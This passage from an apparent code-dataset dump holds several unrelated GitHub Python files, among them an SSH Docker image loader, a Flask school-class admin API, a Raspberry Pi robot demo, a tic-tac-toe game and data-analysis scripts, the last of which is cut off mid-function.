stdo\n\n\ndef main():\n \"\"\"Copy and load of Docker image.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--topo\", required=True,\n help=\"Topology file\")\n parser.add_argument(\"-d\", \"--directory\", required=True,\n help=\"Destination directory\")\n parser.add_argument(\"-i\", \"--images\", required=False, nargs='+',\n help=\"Images paths to copy\")\n parser.add_argument(\"-c\", \"--cancel\", help=\"Cancel all\",\n action=\"store_true\")\n\n args = parser.parse_args()\n topology_file = args.topo\n images = args.images\n directory = args.directory\n cancel_all = args.cancel\n\n work_file = open(topology_file)\n topology = load(work_file.read())['nodes']\n\n ssh = SSH()\n for node in topology:\n if topology[node]['type'] == \"DUT\":\n print(\"###TI host: {host}\".format(host=topology[node]['host']))\n ssh.connect(topology[node])\n\n if cancel_all:\n # Remove destination directory on DUT\n cmd = \"rm -r {directory}\".format(directory=directory)\n stdout = ssh_ignore_error(ssh, cmd)\n print(\"###TI {stdout}\".format(stdout=stdout))\n\n else:\n # Create installation directory on DUT\n cmd = \"rm -r {directory}; mkdir {directory}\"\\\n .format(directory=directory)\n stdout = ssh_no_error(ssh, cmd)\n print(\"###TI {stdout}\".format(stdout=stdout))\n\n # Copy images from local path to destination dir\n for image in images:\n print(\"###TI scp: {}\".format(image))\n ssh.scp(local_path=image, remote_path=directory)\n\n # Load image to Docker.\n cmd = \"for f in {directory}/*.tar.gz; do \"\\\n \"sudo docker load -i $f; done\".format(directory=directory)\n stdout = ssh_no_error(ssh, cmd)\n print(\"###TI {}\".format(stdout))\n\n # Remove images from Docker.\n cmd = \"docker rmi $(sudo docker images -f 'dangling=true' -q)\"\n stdout = ssh_ignore_error(ssh, cmd, sudo=True)\n print(\"###TI {}\".format(stdout))\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"preym17/csit","sub_path":"resources/tools/scripts/topo_container_copy.py","file_name":"topo_container_copy.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18455485847","text":"import json\nimport logging\nfrom collections import namedtuple\nfrom typing import List\n\nimport requests\nfrom injector import Injector\n\nfrom Fly.models.avia_subscription import AviaSubscription\nfrom configuration import Configuration\n\n\nclass AviaSubscriptionService:\n def __init__(self):\n injector = Injector()\n configuration = injector.get(Configuration)\n\n self.secret_key = configuration.config['DEFAULT']['SECRET']\n self.api_url = configuration.config['DEFAULT']['URL']\n self.url_get_avia = self.api_url + \"/api/v1/avia-subscriptions\"\n\n def get_actual_subscriptions(self) -> List[AviaSubscription]:\n headers = {'Content-type': 'application/json', # Определение типа данных\n 'Content-Encoding': 'utf-8',\n 'Authorization': 'Token %s' % self.secret_key}\n\n answer = requests.get(self.url_get_avia, headers=headers)\n result = json.loads(answer.text, object_hook=lambda d: namedtuple('AviaSubscription', d.keys())(*d.values()))\n\n if answer.status_code != 200:\n logging.error(answer.text)\n\n return result\n\n @staticmethod\n def get_unic_subcription(subsriptions: List[AviaSubscription]) -> List[AviaSubscription]:\n result = []\n for item in subsriptions:\n if any(x for x in result if (x.flight_number == item.flight_number) and\n (x.flight_departure == item.flight_departure)):\n continue\n else:\n result.append(item)\n\n return result\n\n @staticmethod\n def get_subscraption_by_flight_number(subsriptions: List[AviaSubscription],\n flight_number, flight_departure) -> List[AviaSubscription]:\n result = []\n for item in subsriptions:\n if ((item.flight_number == flight_number)\n and (item.flight_departure == flight_departure)):\n result.append(item)\n\n return result\n","repo_name":"CoderGosha/WT_Flightstats","sub_path":"Fly/services/avia_subscription_service.py","file_name":"avia_subscription_service.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34898713552","text":"## Calculate the length of a iterable object\ndef calc_len(x):\n length = 0\n for i in x:\n length += 1\n return length\n\n\n## print(calc_len([14, 19, 7, 13, 19, 6, 4, 19, 16, 19]))\n\n\n## Create a set from a object\ndef make_set(y):\n good_set = []\n for n in y:\n if n not in good_set:\n good_set.append(n)\n return good_set\n\n\n## print(make_set([24, 61, 4, 35, 32, 83, 38, 33, 40, 24]))\n## print(len(make_set([24, 61, 4, 35, 32, 83, 38, 33, 40, 24])))\n\n## Create a range function with start, stop, and step\n\n\ndef custom_range(stop, start=0, step=1):\n range_list = [start]\n while start + step < stop:\n start += step\n range_list.append(start)\n return range_list\n\n\n##print(custom_range(6, 1, 2))\n","repo_name":"itesser/CT_Coursework","sub_path":"Week_2/sample_mods.py","file_name":"sample_mods.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41895624048","text":"import torch\nimport torchaudio\nfrom Generator import Generator as gen\n\nsong_lenght = 30 # in seconds\nsong_sample_rate = 44100\nmodel_path = \"models\\\\\"\nmodel_name = \"1rnn221v1.pt\"\nsave_path = \"saved\\\\\"\nsong_name = \"test1.wav\"\n\ndevice = torch.device('cuda')\n\ndef load_model_params(model_path, model):\n checkpoint = torch.load(model_path)\n model.load_state_dict(checkpoint[\"state_dictionary\"])\n return model\n\nmodel = gen(2, 2, 1).to(device)\nmodel = load_model_params(model_path + model_name, model)\nsong_step = torch.randn(1, 1, 2).to(device)\nsong_step, h_save = model.forward(song_step)\n\nfinal_song = []\nsample_lenght = song_lenght * song_sample_rate\nfor song_l in range(sample_lenght):\n\n song_step, h_save = model.running_forward(song_step, h_save)\n final_song.append(song_step)\n print(f\"{(round(song_l/sample_lenght, 1))*100}% \", end=\"\\r\")\n\nfinal_song = torch.cat(final_song).squeeze(1).permute(1, 0).cpu().detach()\n\nprint(final_song.shape)\ntorchaudio.save(save_path+song_name, final_song, song_sample_rate)\n\n","repo_name":"BoykoDenis/dubstep_gen_gan","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10321819072","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 距離認識デモ\n# for Bezelie Flitz\n# for Raspberry Pi\n\nfrom random import randint # 乱数の発生\nfrom time import sleep # ウェイト処理\nimport subprocess # 外部プロセスを実行するモジュール\nimport json # jsonファイルを扱うモジュール\nimport csv # CSVファイルを扱うモジュール\nimport sys # python終了sys.exit()のために必要\nimport bezelie # べゼリー専用サーボ制御モジュール\nimport RPi.GPIO as GPIO\nimport time\n\n# 定義\npinSwitch = 4\n#csvFile = \"data_rangeDialogE.csv\" # セリフリスト\ncsvFile = \"data_rangeDialogJ.csv\" # セリフリスト\nttsJpn = \"exec_talkJpn.sh\" # 音声合成実行ファイル\nttsEng = \"exec_talkEng.sh\" # 英語発話シェルスクリプトのファイル名\n\n# 初期設定\n#bezelie.moveCenter()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pinSwitch, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# 関数\ndef replyMessage(keyWord): # 対話\n data = [] # 対話ファイル(csv)を変数dataに読み込む\n with open(csvFile, 'rt') as f: # csvFileをtextでオープン\n for i in csv.reader(f): # ファイルから1行ずつiに読み込む\n data.append(i) # dataに追加\n\n data1 = [] # dataから質問内容がキーワードに一致している行をdata1として抜き出す\n for index,i in enumerate(data): # index=連番\n if i[0]==keyWord: #\n print (\"見つかった\")\n j = randint(1,100) # 1から100までの乱数を発生させる\n data1.append(i+[j]+[index]) # data1=質問内容,返答,乱数,連番のリスト\n\n if data1 == []: # data1が空っぽだったらランダムで返す\n print (\"ランダム\")\n for index,i in enumerate(data): \n j = randint(1,100) \n data1.append(i+[j]+[index])\n\n maxNum = 0 # data1の候補から乱数値が最大なものを選ぶ\n for i in data1: \n if i[2] > maxNum: \n maxNum = i[2] \n ansNum = i[3] \n\n bez.moveRnd()\n # subprocess.call(\"sh \"+ttsEng+\" \"+data[ansNum][1], shell=True)\n subprocess.call(\"sh \"+ttsJpn+\" \"+data[ansNum][1], shell=True)\n bez.stop()\n\n# サーボの初期化\nbez = bezelie.Control() # べゼリー操作インスタンスの生成\nbez.moveCenter() # サーボの回転位置をトリム値に合わせる\n\n# 初回処理\n#subprocess.call(\"sh \"+ttsEng+\" \"+u\"preparation-has-been-completed\", shell=True)\nsubprocess.call(\"sh \"+ttsJpn+\" 準備完了\", shell=True)\n\n# メインループ\ndef main():\n try:\n while True: # infinity loop\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pinSwitch, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n if GPIO.input(pinSwitch)==GPIO.LOW:\n print (\"近いです\")\n else:\n replyMessage(u\"顔発見\")\n sleep (0.5)\n\n except KeyboardInterrupt: # CTRL+Cで終了\n bez.moveCenter()\n sleep (0.2)\n bez.stop()\n sleep (0.1)\n GPIO.cleanup()\n sys.exit(0)\n\nif __name__ == \"__main__\":\n main()\n GPIO.cleanup()\n sys.exit(0)\n","repo_name":"bezelie/flitz","sub_path":"demo_switch1.py","file_name":"demo_switch1.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43328745842","text":"import sys, os\nbasePath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(basePath)\n\nfrom np.lib import metric\nfrom np.lib import variable_store as VS\nfrom np import util\nimport pydot\n \n\ndef getName(varClass, nameType):\n\n nameFunctions = {\n 'id': VS.getClassnameForId,\n 'alias': VS.getAlias,\n 'option': VS.getOption,\n 'class': VS.getClassname\n }\n\n\n nameAndUnits = nameType.split(\".\")\n name = nameAndUnits[0]\n result = nameFunctions[name](varClass)\n if (len(nameAndUnits) > 1) and varClass.units:\n result = \"%s\\n(%s)\" % (result, varClass.units)\n return result\n\n\n\ndef buildPyDotGraph(variableGraph, nameType):\n \"\"\"\n build up Pydot graph of nodes (Variables) and edges (Variable Dependencies)\n \"\"\"\n graph = pydot.Dot(graph_type='digraph', rankdir='LR')\n\n # First add nodes\n for var in variableGraph:\n fill_color = \"#AA9999\"\n # fill based on whether var is a leaf (i.e. dependencies are empty)\n if len(var[1]) == 0:\n fill_color = \"#9999AA\"\n\n node_var = var[0]\n node = pydot.Node(getName(node_var, 'id'), style='filled', \n fillcolor=fill_color)\n node.set_label(getName(node_var, nameType))\n graph.add_node(node)\n\n # Now add edges\n for var_to in variableGraph:\n for var_from in var_to[1]:\n node_from = graph.get_node(getName(var_from, 'id'))# [0]\n node_to = graph.get_node(getName(var_to[0], 'id'))# [0]\n graph.add_edge(pydot.Edge(node_from, node_to))\n\n return graph\n\n\nif __name__ == '__main__':\n\n if (len(sys.argv) < 4):\n sys.stderr.write(\"example usage: python model_demand_dependencies.py model variable outfile [name_type]\\n\")\n sys.exit()\n\n # setup model\n model = sys.argv[1]\n variable = sys.argv[2] \n outfile = sys.argv[3]\n nameType = \"alias\"\n if len(sys.argv) == 5:\n nameType = sys.argv[4]\n\n mvModel = metric.getModel(model)\n modelVar = util.getSubModuleFromString(mvModel, variable)\n dependencies = VS.buildOrderedDependencies(modelVar)\n graph = buildPyDotGraph(dependencies, nameType)\n \n graph.write(outfile)\n \n\n \n","repo_name":"SEL-Columbia/networkplanner","sub_path":"utilities/model_var_dependencies.py","file_name":"model_var_dependencies.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"6688465519","text":"from aste.workers.msworkers import MSBuildWorker\nfrom aste.workers.mixins import TestRunnerMixin\nfrom shutil import make_archive\nfrom datetime import datetime\nimport os\n\n\nclass BoogieWorker(TestRunnerMixin, MSBuildWorker):\n \"\"\"Implements the steps necessary to build Boogie.\n \"\"\"\n\n def __init__(self, env):\n super(BoogieWorker, self).__init__(env, 'Boogie')\n\n def set_version_number(self):\n now = datetime.now()\n\n version = \"%s.%s.%s%s.%s\" % (self.cfg.VersionNumbers.Boogie.Major,\n self.cfg.VersionNumbers.Boogie.Minor,\n now.year - self.cfg.VersionNumbers.Boogie.YearZero,\n now.strftime('%m%d'),\n now.strftime('%H%M'))\n\n self.cd(self.cfg.Paths.Boogie + \"\\Build\")\n cmd = \"%s updateVersionFile.xml /p:CCNetLabel=%s\" % (\n self.cfg.Apps.MSBuild, version)\n\n self.runSafely(cmd)\n\n def copySpecSharpToBoogie(self):\n self.cd(self.cfg.Paths.Boogie + \"\\Binaries\")\n cmd = \"%s SPECSHARPROOT=%s\" % (self.cfg.Apps.nmake2010,\n self.cfg.Paths.SpecSharp)\n\n self.runSafely(cmd)\n\n def buildBoogie(self):\n self.cd(self.cfg.Paths.Boogie + \"\\Source\")\n cmd = \"%s Boogie.sln /Rebuild Checked\" % self.cfg.Apps.devenv2010\n self._runDefaultBuildStep(cmd)\n\n def buildDafny(self):\n self.cd(self.cfg.Paths.Boogie + \"\\Source\")\n cmd = \"%s Dafny.sln /Rebuild Checked\" % self.cfg.Apps.devenv2010\n self._runDefaultBuildStep(cmd)\n\n def testBoogie(self):\n failed = self.runTestFromAlltestsFile(\n self.cfg.Paths.Boogie + \"\\\\Test\\\\alltests.txt\", 'testBoogie',\n self.cfg.Flags.ShortTestsOnly)\n\n self.project_data['tests']['failed'] = failed\n\n def zip_binaries(self, filename):\n self.cd(self.cfg.Paths.Boogie + \"\\Binaries\")\n cmd = \"PrepareBoogieZip.bat\"\n self.runSafely(cmd)\n # make_archive expects an archive name without a filename extension.\n archive_name = os.path.splitext(os.path.abspath(filename))[0]\n root_dir = os.path.abspath(\"export\")\n make_archive(archive_name, 'zip', root_dir)\n","repo_name":"ggrov/tacny","sub_path":"boogie-partners/Aste/aste/workers/boogieworkers.py","file_name":"boogieworkers.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11941766516","text":"from flask import Blueprint, request, abort, jsonify\n\nfrom . import admin_token_required, db\n\n@admin_token_required\ndef delete_students_from_class():\n if not request.is_json:\n abort(400, \"Expected json\")\n if (not \"class_id\" in request.json or\n type(request.json[\"class_id\"]) != int):\n abort(400, \"Expected class id as int\")\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute('''\n DELETE FROM students\n WHERE class_id=%s\n ''', \n (request.json[\"class_id\"], )\n )\n database.commit()\n return jsonify({\n \"result\": \"OK\"\n }), 200\n\n\n@admin_token_required\ndef get_classes_short():\n cursor = db.get_db().cursor()\n cursor.execute('''\n SELECT id, class_name\n FROM classes ORDER BY id;\n '''\n )\n exec_result = cursor.fetchall()\n if exec_result is None:\n return None\n result = [{\n \"id\": data[0],\n \"name\": data[1],\n \"type\": \"ClassShort\"\n } for data in exec_result\n ]\n return jsonify(result), 200\n\n\n@admin_token_required\ndef get_class_full():\n print(request.json)\n if (\n not request.is_json or\n not \"id\" in request.json.keys() or\n type(request.json[\"id\"]) != int\n ):\n abort(400)\n\n cursor = db.get_db().cursor()\n cursor.execute(\n '''\n SELECT classes.id, classes.class_name, groups.id AS full_class_group_id\n FROM classes \n INNER JOIN groups ON groups.class_id=classes.id\n WHERE classes.id=%s AND groups.is_full_class_group=True\n ''',\n (request.json[\"id\"], )\n )\n class_exec_result = cursor.fetchone()\n\n if class_exec_result is None:\n abort(400)\n\n cursor.execute(\n '''\n SELECT id, username, full_name, email \n FROM students WHERE class_id=%s ORDER BY full_name\n ''',\n (request.json[\"id\"], )\n )\n students_exec_result = cursor.fetchall()\n\n return jsonify({\n \"type\": \"ClassFull\",\n \"id\": class_exec_result[0],\n \"name\": class_exec_result[1],\n \"full_class_group_id\": class_exec_result[2],\n \"students\": [\n {\n \"id\": student_data[0],\n \"username\": student_data[1],\n \"full_name\": student_data[2],\n \"email\": student_data[3],\n \"type\": \"StudentWithoutClass\"\n } for student_data in students_exec_result\n ]\n })\n\n@admin_token_required\ndef move_students_to_class():\n if (\n not request.is_json or\n not \"class_id_from\" in request.json.keys() or\n type(request.json[\"class_id_from\"]) != int or\n not \"class_id_to\" in request.json.keys() or\n type(request.json[\"class_id_to\"]) != int\n ):\n abort(400, \"Expected json with class_id_from and class_id_to as ints\")\n database = db.get_db()\n cursor = database.cursor()\n try:\n cursor.execute('''\n UPDATE students\n SET class_id=%s\n WHERE class_id=%s\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n cursor.execute('''\n UPDATE groups\n SET class_id=%s\n WHERE class_id=%s AND is_full_class_group=False\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n cursor.execute('''\n DELETE FROM teachers_groups AS tg\n WHERE tg.group_id=%s AND EXISTS(\n SELECT 1 FROM teachers_groups AS tcgr\n WHERE tcgr.group_id=%s AND\n tcgr.teacher_id=tg.teacher_id AND\n tcgr.subject_id=tg.subject_id\n )\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n cursor.execute('''\n UPDATE teachers_groups AS tg\n SET group_id=%s\n WHERE group_id=%s\n ''', (request.json[\"class_id_to\"], request.json[\"class_id_from\"]))\n except db.psycopg2.errors.lookup(db.psycopg2.errorcodes.FOREIGN_KEY_VIOLATION):\n abort(400, \"Class with class_id_to doesn't exist\")\n else:\n database.commit()\n return jsonify(result=\"ok\")\n\n@admin_token_required\ndef edit_class():\n if not (\n request.is_json and\n type(request.json.get('id')) is int and\n type(request.json.get('name')) is str and\n len(request.json.get('name')) in range(1, 256)\n ):\n abort(400, \"Invalid data\")\n\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute('''\n UPDATE classes\n SET class_name=%s\n WHERE id=%s RETURNING True;\n ''', (\n request.json[\"name\"],\n request.json[\"id\"]\n ))\n if cursor.fetchone() is None:\n abort(400, 'Wrong class id')\n database.commit()\n return jsonify(result='ok')\n\n\n@admin_token_required\ndef create_class():\n if not (\n request.is_json and\n type(request.json.get(\"name\")) is str and\n len(request.json['name']) in range(1, 257) and\n type(request.json.get(\"students_ids\")) == list\n ): \n abort(400, \"Expected json with name and students_ids\")\n\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute(r'''\n SELECT EXISTS(SELECT 1 FROM classes WHERE class_name=%s);\n ''', (request.json['name'], ))\n if cursor.fetchone()[0]:\n abort(400, 'Class with this name already exists')\n\n cursor.execute('''\n INSERT INTO classes (class_name)\n VALUES (%s) RETURNING id;\n ''', (request.json[\"name\"], ))\n class_id = cursor.fetchone()[0]\n cursor.execute('''\n INSERT INTO groups (group_name, class_id, is_full_class_group)\n VALUES ('Весь клас', %s, True); \n ''', (class_id, ))\n for id_ in request.json[\"students_ids\"]:\n db.edit_student(id_, {\"class_id\": class_id})\n \n database.commit()\n return jsonify({\"result\": \"ok\"}), 200\n\n\ndef delete_class():\n if not (\n request.is_json and\n type(request.json.get('id')) is int\n ):\n abort(400, 'Invalid data')\n\n database = db.get_db()\n cursor = database.cursor()\n cursor.execute(r'''\n DELETE FROM classes WHERE id=%s RETURNING 1;\n ''', (request.json['id'], ));\n if cursor.fetchone() is None:\n abort(400, 'Wrong class id')\n\n database.commit()\n return jsonify(result='ok')","repo_name":"scriptium/rateyard","sub_path":"api/rateyard_api/admin/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"19678179767","text":"import pandas as pd\n\nfrom kmodes.kmodes import KModes\nfrom sklearn.manifold import TSNE\n\nimport matplotlib.pyplot as plt\n\n# Read in the data\naccident_df = pd.read_csv(\"data/accident.CSV\", encoding=\"windows-1252\")\n\ncase_id = \"ST_CASE\"\n\naccident_df.set_index(case_id, inplace=True)\n\naccident_useful_columns = {\n \"ROUTE\": \"Route Signing\",\n \"RUR_URB\": \"Land Use\",\n \"FUNC_SYS\": \"Functional System\",\n \"RD_OWNER\": \"Ownership\",\n \"HARM_EV\": \"Harmful Event\",\n \"MAN_COLL\": \"Manner of Collision\",\n \"RELJCT2\": \"Relation to Junction\",\n \"TYP_INT\": \"Intersection Type\",\n \"REL_ROAD\": \"Relation to Trafficway\",\n \"WRK_ZONE\": \"Work Zone\",\n \"LGT_COND\": \"Light Condition\",\n \"WEATHER\": \"Weather\",\n \"SCH_BUS\": \"School Bus\"\n}\n\n# Filter out the columns we don't need\naccident_df = accident_df.filter(items=accident_useful_columns.keys())\n\n# Create numpy matrix\naccident_mat = accident_df.to_numpy()\n\n# k-modes clustering\nbest_cost = float(\"inf\")\nbest_clusters = []\nbest_km = None\nfor n_clusters in range(2, 10):\n km = KModes(n_clusters=n_clusters, init=\"Huang\", n_jobs=16, verbose=1)\n clusters = km.fit_predict(accident_mat)\n if km.cost_ < best_cost:\n best_cost = km.cost_\n best_clusters = clusters\n best_km = km\n\nprint(f\"Best init: {best_km.init}\")\nprint(f\"Best n: {best_km.n_clusters}\")\nprint(f\"Best cost: {best_cost}\")\nprint(f\"Best clusters: {best_clusters}\")\n\n# t-SNE visualization\nplt.clf()\ntsne = TSNE(n_components=2, learning_rate=\"auto\", verbose=1)\nz = tsne.fit_transform(accident_mat)\nplt.figure(figsize=(20,20))\nplt.margins(0)\nplt.axis('off')\nfig = plt.scatter(\n z[:,0], z[:,1],\n c=clusters,\n cmap='hsv',\n alpha=0.8,\n s=20,\n lw=0,\n edgecolor='white'\n)\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig(\"tsne.png\", transparent=False)\n\nprint(clusters)\n\n","repo_name":"jlashgar/CS7050-FinalProject","sub_path":"collision_analysis.py","file_name":"collision_analysis.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4836543089","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\n\r\nwindow=Tk()\r\n \r\nwindow.configure(background=\"light blue\")\r\nwindow.title(\"TIC-TAC-TOE-GAME\")\r\nl1=Label(window,text=\"Player1:-X\",font=('Times New Roman','12'))\r\nl1.grid(row=0,column=0)\r\nl2=Label(window,text=\"Player2:-0\",font=('Times New Roman','12'))\r\nl2.grid(row=0,column=2)\r\nl3=Label(window,text='Player1 turn ',font=('Times New Roman','12'))\r\nl3.grid(row=1,column=0)\r\n\r\nwin=1\r\nrunning=0\r\ngame=running\r\nchance=0\r\n\r\ndef click1():\r\n \r\n global chance\r\n global game\r\n if(game==running):\r\n if(b1['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b1['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b1['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click2():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b2['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b2['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b2['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click3():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b3['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b3['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b3['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click4():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b4['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b4['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b4['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click5():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b5['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b5['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b5['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click6():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b6['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b6['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b6['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click7():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b7['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b7['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b7['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click8():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b8['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b8['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b8['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click9():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b9['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n if(chance%2==0):\r\n b9['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b9['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\n \r\n\r\n \r\n\r\n\r\nb1 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click1)\r\nb1.grid(row=3, column=0)\r\n\r\nb2 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click2)\r\nb2.grid(row=3, column=1)\r\n\r\nb3 = Button(window, text=' ',font='Arial', bg='light green', fg='black', height=6, width=10, command=click3)\r\nb3.grid(row=3, column=2)\r\n\r\nb4 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command= click4)\r\nb4.grid(row=4, column=0)\r\n\r\nb5 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click5)\r\nb5.grid(row=4, column=1)\r\n\r\nb6 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click6)\r\nb6.grid(row=4, column=2)\r\n\r\nb7 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click7)\r\nb7.grid(row=5, column=0)\r\n\r\nb8 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click8)\r\nb8.grid(row=5, column=1)\r\n\r\nb9 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click9)\r\nb9.grid(row=5, column=2)\r\ndef Winner():\r\n global game\r\n if(b1['text']==b2['text'] and b2['text'] ==b3['text'] and b2['text']!=' '):\r\n game=win\r\n elif(b4['text']==b5['text'] and b5['text'] ==b6['text'] and b5['text']!=' '):\r\n game=win\r\n elif(b7['text']==b8['text'] and b8['text'] ==b9['text'] and b8['text']!=' '):\r\n game=win\r\n elif(b1['text']==b4['text'] and b4['text'] ==b7['text'] and b1['text']!=' '):\r\n game=win\r\n elif(b2['text']==b5['text'] and b5['text'] ==b8['text'] and b2['text']!=' '):\r\n game=win\r\n elif(b3['text']==b6['text'] and b6['text'] ==b9['text'] and b3['text']!=' '):\r\n game=win\r\n elif(b1['text']==b5['text'] and b5['text'] ==b9['text'] and b5['text']!=' '):\r\n game=win\r\n elif(b3['text']==b5['text'] and b5['text'] ==b7['text'] and b5['text']!=' '):\r\n game=win\r\n elif(b1['text']!=' ' and b2['text']!=' ' and b3['text']!=' ' and b4['text']!=' ' and b5['text']!=' ' and b6['text']!=' ' and b7['text']!=' ' and b8['text']!=' ' and b9['text']!=' '):\r\n game=-1\r\n else:\r\n game=running\r\n\r\ndef result(chance):\r\n global game\r\n if(game==1):\r\n if(chance%2==0):\r\n messagebox.showinfo('Result','Player 1 won!!!')\r\n else:\r\n messagebox.showinfo('Result','Player 2 won!!!')\r\n elif(game==-1):\r\n messagebox.showinfo('Result','Its a tie!!!')\r\n\r\n\r\n\r\nwindow.mainloop()\r\n \r\n","repo_name":"ShivaPrasadhegde101/tic_tac_toe_gui","sub_path":"tic_tac_toe_gui.py","file_name":"tic_tac_toe_gui.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1546229301","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, precision_recall_curve\n\n\ndef plot_precision_recall(y_true, y_score, title='Precision-recall curve'):\n plt.title(title)\n plt.ylabel('Precision: tp/(tp+fp)')\n plt.xlabel('Recall (true positive rate): tp/(tp+fn)')\n precision, recall, thresholds = precision_recall_curve(y_true, y_score)\n plt.plot(recall, precision)\n\n\ndef plot_roc(y_true, y_score, title='ROC curve'):\n plt.title(title)\n plt.xlabel('False positive rate: fp/(fp+tn)')\n plt.ylabel('True positive rate (recall): tp/(tp+fn)')\n fpr, tpr, thresholds = roc_curve(y_true, y_score)\n plt.plot(fpr, tpr)\n\n\ndef plot_precision_vs_score(y_true, y_score, title='Precision vs score'):\n plt.title(title)\n plt.xlabel('Score threshold')\n plt.ylabel('Precision: tp/(tp+fp)')\n precision, recall, thresholds = precision_recall_curve(y_true, y_score)\n plt.plot(thresholds, precision[:-1])\n\n\ndef 